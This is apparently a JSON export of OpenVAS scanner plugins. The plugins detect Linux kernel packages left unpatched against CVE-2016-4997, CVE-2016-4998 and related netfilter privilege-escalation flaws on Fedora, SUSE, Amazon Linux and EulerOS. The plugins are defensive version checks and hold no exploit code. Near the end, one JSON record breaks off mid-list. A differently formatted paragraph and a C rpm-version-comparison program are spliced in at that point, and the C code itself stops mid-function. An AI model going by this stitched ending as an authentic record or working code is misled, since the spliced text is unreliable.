See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808522\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-02 06:38:59 +0200 (Sat, 02 Jul 2016)\");\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5728\",\n \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-1c409313f4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-1c409313f4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6AP44WYNH7WHAMP5WVQMJC3Z55GPMFJJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.6.3~300.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-07-01T00:00:00", "id": "OPENVAS:1361412562310851360", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851360", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:1710-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851360\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-01 05:25:24 +0200 (Fri, 01 Jul 2016)\");\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-4997\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:1710-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 GA kernel was updated to receive one critical\n security fix.\n\n Security issue fixed:\n\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. 
(bsc#986362)\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1710-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", 
rpm:\"kernel-default-extra~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.60~52.54.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.60~52.54.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", 
rpm:\"kernel-default-devel~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.60~52.54.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.60~52.54.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5728", "CVE-2016-1583", 
"CVE-2016-5829", "CVE-2016-1237", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-07-10T00:00:00", "id": "OPENVAS:1361412562310808556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808556", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-73a733f4d9", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-73a733f4d9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808556\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-10 07:19:32 +0200 (Sun, 10 Jul 2016)\");\n script_cve_id(\"CVE-2016-1583\", \"CVE-2016-4470\", \"CVE-2016-4998\", \"CVE-2016-5829\", \"CVE-2016-5728\", \"CVE-2016-1237\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-73a733f4d9\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-73a733f4d9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FVENSYS4VXRLKHNVGHP4I4USAPYJ2RFT\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.5.7~202.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:56:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4951", "CVE-2016-4997", "CVE-2016-4998"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-10-26T00:00:00", "id": "OPENVAS:1361412562310120707", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120707", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-718)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120707\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:14 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-718)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in the Linux kernel. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update kernel to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-718.html\");\n script_cve_id(\"CVE-2016-4951\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.4.14~24.50.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:32:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "The remote host is missing an update for the Huawei 
EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161048", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2016-1048)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1048\");\n script_version(\"2020-01-23T10:40:56+0000\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2016-1048)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security 
Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1048\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1048\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2016-1048 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The netfilter subsystem in the Linux kernel through 4.5.2 does not validate certain offset fields, which allows local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call.(CVE-2016-3134)\n\nThe compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE setsockopt implementations in the netfilter subsystem in the Linux kernel before 4.6.3 allow local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that triggers an unintended decrement.(CVE-2016-4997)\n\nThe IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel before 4.6 allows local users to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from kernel heap memory by leveraging in-container root access to provide a crafted offset value that leads to crossing a ruleset blob boundary.(CVE-2016-4998)\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~229.42.1.93\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4997", "CVE-2016-4998", 
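The plugins above all reduce to one decision: is the installed kernel EVR older than the build named in the `isrpmvuln()` call (for example `kernel~3.10.0~229.42.1.93`)? The following is an added example, not code from the Greenbone plugins or from rpm, that reimplements that rpmvercmp-style comparison in C so the ordering rules are visible, and adds the check a "package" QoD result cannot make: whether the kernel actually booted is still the old one. The function names, the `name~version~release` parsing, the architecture-suffix table and the sample version strings are this example's own assumptions.

```c
/* Added example, not code from the Greenbone plugins above or from rpm itself:
 * a minimal rpmvercmp-style comparison showing how a "package" QoD check such
 * as isrpmvuln(pkg:"kernel", rpm:"kernel~3.10.0~327.36.1.el7") decides that an
 * installed kernel is older than the fixed build, plus the check the plugins
 * do not make: whether the *running* kernel is still the old one.
 * Function names and sample versions are this example's own.
 * Build: cc -o evr evr.c */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* Compare two version strings the way rpm does: alternate runs of digits
 * (compared numerically, leading zeros dropped) and letters (compared
 * lexically); separators are skipped; a numeric segment sorts newer than an
 * alphabetic one; when one side runs out of segments the other is newer.
 * Returns -1, 0 or 1. */
int rpm_vercmp(const char *a, const char *b)
{
    while (*a || *b) {
        while (*a && !isalnum((unsigned char)*a)) a++;
        while (*b && !isalnum((unsigned char)*b)) b++;
        if (!*a || !*b)
            break;
        int a_num = isdigit((unsigned char)*a) != 0;
        int b_num = isdigit((unsigned char)*b) != 0;
        if (a_num != b_num)
            return a_num ? 1 : -1;
        const char *sa = a, *sb = b;
        if (a_num) {
            while (isdigit((unsigned char)*a)) a++;
            while (isdigit((unsigned char)*b)) b++;
            while (sa < a && *sa == '0') sa++;
            while (sb < b && *sb == '0') sb++;
            size_t la = (size_t)(a - sa), lb = (size_t)(b - sb);
            if (la != lb)
                return la > lb ? 1 : -1;   /* more digits means a larger number */
            int c = strncmp(sa, sb, la);
            if (c)
                return c > 0 ? 1 : -1;
        } else {
            while (isalpha((unsigned char)*a)) a++;
            while (isalpha((unsigned char)*b)) b++;
            size_t la = (size_t)(a - sa), lb = (size_t)(b - sb);
            int c = strncmp(sa, sb, la < lb ? la : lb);
            if (c)
                return c > 0 ? 1 : -1;
            if (la != lb)
                return la > lb ? 1 : -1;
        }
    }
    if (!*a && !*b)
        return 0;
    return *a ? 1 : -1;
}

/* Split "VERSION-RELEASE" at the last '-' and compare version first, release second. */
int rpm_evrcmp(const char *a, const char *b)
{
    char va[128], vb[128];
    const char *da = strrchr(a, '-'), *db = strrchr(b, '-');
    size_t la = da ? (size_t)(da - a) : strlen(a);
    size_t lb = db ? (size_t)(db - b) : strlen(b);
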